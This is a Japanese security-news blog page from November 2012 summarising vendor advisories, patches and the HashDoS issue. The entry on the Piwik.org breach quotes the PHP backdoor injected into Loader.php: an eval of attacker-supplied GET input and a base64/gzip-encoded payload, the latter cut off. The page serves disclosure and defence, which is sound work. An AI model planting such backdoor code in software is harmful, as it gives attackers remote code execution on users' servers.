セキュリティホール memo - 2012.11

Last modified: Tue Aug 19 18:38:54 2014 +0900 (JST)


 このページの情報を利用される前に、注意書きをお読みください。


2012.11.30

Piwik.orgのウェブサーバに不正な攻撃が見つかりました
(日本 Piwik ユーザ会, 2012.11.29)

 リアルタイムログ解析ツール Piwik の本家サイト Piwik.org が 2012.11.26 にハクられ、改ざんされた Piwik 1.9.2 Zip ファイルが設置されたそうで。

不正なプログラムはどのようにpiwik.orgを侵害したのですか?

不正なプログラムは、我々が使っていたWordPressのプラグインのセキュリティ上の問題を利用し、piwik.orgサーバーへの部分的なアクセスを獲得しました。

 WordPress ですか……。

 実際に改ざんされているのは piwik/core/Loader.php で、末尾にこんなのが挿入されているそうで:

<?php Error_Reporting(0); if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm'); exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

 関連: Piwik sourcecode backdoored (Yet Another PHP Security Blog, 2012.11.28)

追記

400万部屋以上のホテルのカードキーロックが秒単位で解錠可能な技術が公開される

シマンテックの法人向け「SEP11」に遠隔操作の恐れある脆弱性、現時点で対策方法なし

 Symantec セキュリティアドバイザリー SYM12-017 LiveUpdate パッチについて (シマンテック, 2012.11.29)。SEP 11.x および 12.0 用の修正が 2012.11.29 から LiveUpdate で配布されたそうです。らのゆきさん情報ありがとうございます。

Chrome Stable Channel Update
(Google, 2012.11.29)

 Google Chrome 23.0.1271.95 公開。2 件のセキュリティ欠陥が修正されている。


2012.11.29

ASFWS 2012 - Hash-flooding DoS reloaded: attacks and defenses
(slideshare, 2012.11.17)

 Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2] に対して耐性があるとされたアルゴリズムでも HashDoS 攻撃が可能という指摘。 具体的には MurmurHash3、MurmurHash2、CityHash の脆弱性を指摘。 PDF 版

 著者らは耐性のあるアルゴリズムとして SipHash を提案している。

 対応:

 未対応:

 関連:

Wireshark 1.8.4 / 1.6.12 リリース
(Wireshark.org, 2012.11.28)

 Wireshark 1.8.4 / 1.6.12 登場。11 件の欠陥が修正されている。

wnpa-sec-2012-40: Wireshark ICMPv6 dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-39: Wireshark 3GPP2 A11 dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-38: Wireshark RTCP dissector inifinte loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-37: Wireshark WTP dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-36: Wireshark iSCSI dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-35: Wireshark ISAKMP dissector crash, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-34: Wireshark EIGRP dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-33: Wireshark SCTP dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-32: Wireshark sFlow dissector infinite loop, fixed in 1.8.4
wnpa-sec-2012-31: Wireshark USB dissector infinite loop, fixed in 1.8.4, 1.6.12
wnpa-sec-2012-30: Wireshark pcap-ng host name disclosure, fixed in 1.8.4

 詳細は http://www.wireshark.org/security/ をどうぞ。

追記

Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2]

 PHP で mbstring.encoding_translation=On で hashdos の件、PHP 5.4.9 と同時にリリースされた PHP 5.3.19 でも修正されているので、昨日のエントリを修正しました。 榎本さん情報ありがとうございます。

PHP 5.3.9 Released!

 mbstring.encoding_translation=On で hashdos の件、PHP 5.4.9 と同時にリリースされた PHP 5.3.19 でも修正されているので、昨日のエントリを修正しました。 榎本さん情報ありがとうございます。


2012.11.28

いろいろ (2012.11.28)
(various)

Chrome Stable Channel Update
(Google, 2012.11.26)

 Google Chrome 23.0.1271.91 公開。7 件のセキュリティ欠陥が修正されている。

追記

Experts Warn of Zero-Day Exploit for Adobe Reader

 “Adobe Reader” のセキュリティ機能「サンドボックス」を回避するゼロデイ脆弱性にご用心 (トレンドマイクロ セキュリティ blog, 2012.11.27)

問題の脆弱性の詳細が入手できないことから、トレンドマイクロでは、以下のセキュリティ対策を講じることをお勧めします。

 トレンドマイクロだけでなく、他のセキュリティベンダーからも、確認できたという情報がないんだよね……。うーむ。

About the security content of QuickTime 7.7.3

PHP 5.3.9 Released!

 PHP5.4.8までにhashdos攻撃の危険性? (togetter, 2012.11.23)。mbstring.encoding_translation=On の場合 (デフォルトは "0")、 hashdos 対策コードが効かない状況だった模様です。PHP 5.4.9 で対応されています。

Effective DoS attacks against Web Application Plattforms ? #hashDoS [UPDATE2]

 PHP5.4.8までにhashdos攻撃の危険性? (togetter, 2012.11.23)。mbstring.encoding_translation=On の場合 (デフォルトは "0")、 hashdos 対策コードが効かない状況だった模様です。PHP 5.4.9 で対応されています。

いろいろ (2012.11.12)

Oracle Critical Patch Update Advisory - July 2012


2012.11.27


2012.11.26

いろいろ (2012.11.26)
(various)


2012.11.25


2012.11.24


2012.11.23

いろいろ (2012.11.23)
(various)


2012.11.22

CGI.pm 3.63 Changelog
(CPAN, 2012.11.12)

 CGI.pm 3.62 以前に欠陥、Set-Cookie または P3P ヘッダにおける CR のエスケープ処理が正常になされていないため、ヘッダインジェクション攻撃が可能。 CVE-2012-5526

 CGI.pm 3.63 で修正されている。

Opera 12.11 公開
(opera.com, 2012.11.20)

 Opera 12.11 公開されました。2 件のセキュリティ欠陥が修正されています。 iida さん情報ありがとうございます。

Firefox / Thunderbird 17.0 / 10.0.11 ESR、SeaMonkey 2.14 公開
(mozilla.org, 2012.11.20)

 出ました。セキュリティ修正含みます。

 また Firefox 17 では iframe の sandbox 属性をサポートするそうで。

2012.12.03 追記:

 Firefox 17.0.1 が公開されています。リリースノート。「脆弱性の知られているプラグインに対しては Click to Play 機能が有効になり、ユーザがクリックするまで読み込まれなくなります。詳細はこちらのブログ記事をご覧ください」だそうです。

追記

シマンテックの法人向け「SEP11」に遠隔操作の恐れある脆弱性、現時点で対策方法なし

 アドバイザリがたびたび改訂されてます。また対応・回避策が SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題についてにまとめられています。らのゆきさん情報ありがとうございます。対応・回避策:


2012.11.21


2012.11.20

APSB12-25: Security update: Hotfix available for ColdFusion 10 for Windows
(Adobe, 2012.11.19)

 IIS 上の ColdFusion 10 Update 1 以降に DoS 攻撃を受ける欠陥。ColdFusion 10 Update 5 で修正されている。 Priority Rating: 2。CVE-2012-5674


2012.11.19

いろいろ (2012.11.19)
(various)


2012.11.16

いろいろ (2012.11.16)
(various)


2012.11.15

追記

Experts Warn of Zero-Day Exploit for Adobe Reader

Skype、アカウント乗っ取りのおそれがある脆弱性を修正
(日経 IT Pro, 2012.11.15)

 Skype のパスワードリセットプロセスに欠陥、ユーザー名と電子メールアドレスを知っているだけでアカウントを乗っとれる。

 この欠陥は現在は修正されている


2012.11.14

追記

Oracle Java SE Critical Patch Update Advisory - October 2012

Microsoft 2012 年 11 月のセキュリティ情報
(Microsoft, 2012.11.14)

 .NET Framework が含まれてて、適用には時間がかかるので注意。 Mac 用 Office の更新もあり。

MS12-071 - 緊急: Internet Explorer 用の累積的なセキュリティ更新プログラム (2761451)

 IE 9 のみに 3 つの欠陥。 いずれも攻略 Web ページによって任意のコードを実行できる。 いずれも Exploitability Index: 1

MS12-072 - 緊急: Windows シェルの脆弱性により、リモートでコードが実行される (2727528)

 Windows XP / Server 2003 / Vista / Server 2008 / 7 / Server 2008 R2 / 8 / Server 2012 の Windows エクスプローラーに 2 件の欠陥。いずれも攻略ブリーフケースによって任意のコードを実行できる。いずれも Exploitability Index: 1

  • Windows ブリーフケースの整数アンダーフローの脆弱性 - CVE-2012-1527

  • Windows ブリーフケースの整数オーバーフローの脆弱性 - CVE-2012-1528

MS12-073 - 警告: Microsoft インターネット インフォメーション サービス (IIS) の脆弱性により、情報漏えいが起こる (2733829)

 IIS 7.0 / 7.5 に 2 つの欠陥。Exploitability Index: N/A

  • パスワード漏えいの脆弱性 - CVE-2012-2531

    ログファイルのアクセス許可が不適切なために、local user がログファイルにアクセスし、そこに記されたユーザー名やパスワードを発見できる。

  • FTP コマンド インジェクションの脆弱性 - CVE-2012-2532

    IIS の FTP Service に欠陥があり、「セッションをトランスポート層セキュリティ (TLS) に切り替える前に、FTP コマンドの限定されたセットを実行できる可能性があります」。

MS12-074 - 緊急: .NET Framework の脆弱性により、リモートでコードが実行される (2745030)

 .NET Framework 1.0 SP3 / 1.1 SP1 / 2.0 SP2 / 3.5 / 3.5.1 / 4 / 4.5 に 5 つの欠陥。

MS12-075 - 緊急: Windows カーネルモード ドライバーの脆弱性により、リモートでコードが実行される (2761226)

 Windows XP / Server 2003 / Vista / Server 2008 / 7 / Server 2008 R2 / 8 / Server 2012 に 3 つの欠陥。local user による権限上昇が可能。

  • Win32k の解放後使用の脆弱性 - CVE-2012-2530

    Exploitability Index: 1

  • Win32k の解放後使用の脆弱性 - CVE-2012-2553

    Exploitability Index: 1

  • TrueType フォントの解析の脆弱性 - CVE-2012-2897

    Exploitability Index: 2

MS12-076 - 重要: Microsoft Excel の脆弱性により、リモートでコードが実行される (2720184)

 Excel 2003 / 2007 / 2010、Office 2008 for Mac、Office for Mac 2011、Excel Viewer、Office 互換機能パック Service Pack [23] に 4 つの欠陥。 いずれも攻略 Excel ファイルによって任意のコードを実行できる。いずれも Exploitability Index: 1

  • Excel SerAuxErrBar のヒープ オーバーフローの脆弱性 - CVE-2012-1885

  • Excel のメモリ破損の脆弱性 - CVE-2012-1886

  • Excel SST の解放後の無効な長さの使用の脆弱性 - CVE-2012-1887

  • Excel のスタック オーバーフローの脆弱性 - CVE-2012-2543

 関連:


2012.11.13

いろいろ (2012.11.13)
(various)

追記

Oracle Java SE Critical Patch Update Advisory - October 2012


2012.11.12

いろいろ (2012.11.12)
(various)

2012.11.28 追記:

 マイクロソフト脆弱性調査アドバイザリ MSVR12-018: Symantec Ghost のメモリ破損により、任意のコードが実行される (Microsoft, 2012.11.21)。SYM12-016 - Symantec Ghost Solution Suite にメモリ破損の問題 (シマンテック, 2012.10.10) の件は Microsoft が発見したようで。


2012.11.09

追記

Experts Warn of Zero-Day Exploit for Adobe Reader

 Adobe Reader X/XIのゼロデイ脆弱性を突くPDFエクスプロイトが出現  闇市場で3万〜5万ドルで売られ、銀行顧客を狙った標的型攻撃に使われているとの報告 (ComputerWorld.jp, 2012.11.09)

このエクスプロイトを使ったGoogle Chrome経由での攻撃は失敗するとのことだ。同氏によると、Chromeは、Adobe Readerコンポーネントの保護機能を提供しているという。

2012 年 11 月 14 日のセキュリティ リリース予定 (月例)
(日本のセキュリティチーム, 2012.11.09)

 6 件 (緊急 x 4、重要 x 1、警告 x 1) だそうです。IE あり、Office あり (Excel)、.NET Framework あり。十分な時間を確保しませう。


2012.11.08

Experts Warn of Zero-Day Exploit for Adobe Reader
(Krebs on Security, 2012.11.07)

 Adobe Reader X / XI に 0-day 欠陥があり、既にカスタムバージョンの Blackhole Exploit Kit に組み込まれているという話。Adobe はまだ確認できていない模様。

 Foxit ReaderPDF-XChange ViewerGoogle Chrome の内蔵 PDF ビューアなど、他の PDF ビューアを利用することで回避できる。

2012.11.09 追記:

 Adobe Reader X/XIのゼロデイ脆弱性を突くPDFエクスプロイトが出現  闇市場で3万〜5万ドルで売られ、銀行顧客を狙った標的型攻撃に使われているとの報告 (ComputerWorld.jp, 2012.11.09)

このエクスプロイトを使ったGoogle Chrome経由での攻撃は失敗するとのことだ。同氏によると、Chromeは、Adobe Readerコンポーネントの保護機能を提供しているという。

2012.11.15 追記:

 2012-11-13 Adobe Reader のサンドボックス機構を迂回するゼロデイ脆弱性 (FFRI BLOG, 2012.11.13)

2012.11.28 追記:

 “Adobe Reader” のセキュリティ機能「サンドボックス」を回避するゼロデイ脆弱性にご用心 (トレンドマイクロ セキュリティ blog, 2012.11.27)

問題の脆弱性の詳細が入手できないことから、トレンドマイクロでは、以下のセキュリティ対策を講じることをお勧めします。

 トレンドマイクロだけでなく、他のセキュリティベンダーからも、確認できたという情報がないんだよね……。うーむ。

About the security content of QuickTime 7.7.3
(Apple, 2012.11.07)

 QuickTime 7.7.3 登場。Windows 版では 9 件のセキュリティ欠陥が修正されている。

2012.11.28 追記:

 関連:

シマンテックの法人向け「SEP11」に遠隔操作の恐れある脆弱性、現時点で対策方法なし
(日経 IT Pro, 2012.11.06)

 この件:

 ……シマンテックからアドバイザリ出ました: SYM12-017: セキュリティ アドバイザリー - シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題 (シマンテック, 2012.11.07)。 SEP 12.0 ではなく SEP 12.1 へのアップグレードが推奨されている。また CAB ファイルのスキャンを無効にすることで回避できる。

2012.11.22 追記:

 アドバイザリがたびたび改訂されてます。また対応・回避策が SYM12-017 シマンテックの旧バージョンの Decomposer (圧縮解凍エンジン) に CAB ファイルの問題についてにまとめられています。らのゆきさん情報ありがとうございます。対応・回避策:

2012.11.30 追記:

 Symantec セキュリティアドバイザリー SYM12-017 LiveUpdate パッチについて (シマンテック, 2012.11.29)。SEP 11.x および 12.0 用の修正が 2012.11.29 から LiveUpdate で配布されたそうです。らのゆきさん情報ありがとうございます。

追記

Opera 12.10 Changelog

 さっそく 12.11 が出たみたい: Tired of 12.10 already? (Opera, 2012.11.07) snapshot だった。

いろいろ (2012.11.08)
(various)


2012.11.07

APSB12-24: Security updates available for Adobe Flash Player
(Adobe, 2012.11.06)

 月刊 Flash Player / AIR、今月の更新は……

 任意のコードの実行を招く欠陥 7 つが修正されている。全て Google Security Team から。 CVE-2012-5274 CVE-2012-5275 CVE-2012-5276 CVE-2012-5277 CVE-2012-5278 CVE-2012-5279 CVE-2012-5280

 抄訳版: APSB12-24: Adobe Flash Player に関するセキュリティアップデート公開 (Adobe)

Chrome Stable Channel Release and Beta Channel Update
(Google, 2012.11.06)

 Google Chrome 23.0.1271.64 公開。14 件のセキュリティ欠陥が修正され、Flash も更新されている。 Chrome 23 の機能追加についてはこちら: Longer battery life and easier website permissions (Google, 2012.11.06)

Opera 12.10 Changelog
(Opera, 2012.11.06)

 Opera 12.10 公開。Windows 8 / Mac OS X 10.8 + Retina ディスプレイ対応などの他、セキュリティ欠陥も 6 件修正されている。

2012.11.08 追記:

 さっそく 12.11 が出たみたい: Tired of 12.10 already? (Opera, 2012.11.07) snapshot だった。


2012.11.06

勧告: Tavis Ormandy 氏、Sophos Anti-Virus の脆弱性を発見する
(Sophos, 2012.11.06)

 Sophos Anti-Virus に複数の重大な欠陥。

  1. Visual Basic 6 コントロールの解析の整数オーバーフロー
  2. sophos_detoured_x64.dll ASLR の回避
  3. ソフォス製品による、Internet Explorer の保護モードの無効化
  4. ユニバーサル XSS
  5. Microsoft CAB パーサのメモリ破損に関する脆弱性
  6. RAR 仮想マシン標準フィルタのメモリ破損
  7. ネットワークアップデートサービス経由の特権の昇格
  8. スタックバッファオーバーフローによる PDF ファイルの復号化
さらに最近 Ormandy 氏は、Sophos Anti-Virus のエンジンを停止させる、特別に細工されたファイルのサンプルを提供されました。

 多くは最新配付版で既に修正されているが、「さらに最近」の DoS 攻撃可能な欠陥については 2012.11.28 に修正されるそうだ。 また「ネットワークアップデートサービス経由の特権の昇格」だけ「修正版の配布の完了日: 2012年 5月 8日」と、Ormandy 氏が Sophos に指摘した日 (2011.09.10) よりも前であり、指摘前に既に修正されていたみたい。関連:


2012.11.05


2012.11.04


2012.11.03


2012.11.02

VUPEN Researchers Say They Have Zero-Day Windows 8 Exploit
(threatpost, 2012.11.01)

 今のところ、VUPEN の Chaouki Bekrar 氏がそのように主張しているだけで、詳細は不明。Microsoft もまだ確認できていない模様。

About the security content of iOS 6.0.1 Software Update
(Apple, 2012.11.01)

 iOS 6.0.1 登場。4 つのセキュリティ欠陥 (情報漏洩 x 1、攻略 Web ページによる任意のコードの実行 x 2、パスコードロック迂回 x 1) が修正されている。 CVE-2012-3748 CVE-2012-3749 CVE-2012-3750 CVE-2012-5112

 地図がグチャボロなので iOS 5 のままという人もいるかと思うが、セキュリティ修正を含むので、速やかに iOS 6.0.1 に移行されたい。

 関連: Apple bumps iOS to 6.0.1, fixes an interesting set of bugs (Sophos, 2012.11.01)

追記

iOS6地図は元データや文化の差異ではなく、ずさんなエンジニアリングが原因

 iOS6マップに関するMapInfo視点からの考察 (MapInfo)。同じくインクリメントPの地図データを使用している MapInfo StreetPro との比較で見る、iOS 6 地図の問題点。インクリメントPの地図データそれ自体には問題はないことがよくわかる。問題は、日本の地図文化が他国とは異なることを理解していない点、他国とは異なる手法 (1/2500 詳細地図をベースに開発する) を採用できなかった点にあるとする。

Appleマップは、このような地図の周辺にある文化の違いを十分に理解せず、欧米のロジックに従って、日本の道路を描いたのだと推測されます。
ちなみに、Googleマップで1/2500のスタイルで道路縁が描かれているのは、世界各国の中でも日本のみの特別仕様のようです。ニューヨークはもちろん、ロンドン、北京、バンコク、ソウルなどでも道路中心線から書き起こした道路データが採用されています。

実は、StreetPro Japanを製品化する際にも、この国際標準に関する議論が弊社内でもありました。第一案として海外チームから提案された地図デザインは1/25000の道路をベースとし、建物や駅舎が存在しないものでした。最終的には議論の末に日本仕様に落ち着いたという経緯があります。ローカライズには、以外に高い壁があるように思えます。

About the security content of Safari 6.0.2
(Apple, 2012.11.01)

 Safari 6.0.2 登場。攻略 Web ページを閲覧すると任意のコードが実行される、2 件の欠陥が修正されている。 CVE-2012-3748 CVE-2012-5112

 Safari 6 が提供されていない、Windows および Mac OS X 10.6 以前では、Safari を使うのはやめましょう。


2012.11.01

追記

[exim-announce] Exim 4.80.1 Security Release


[セキュリティホール memo]
[私について]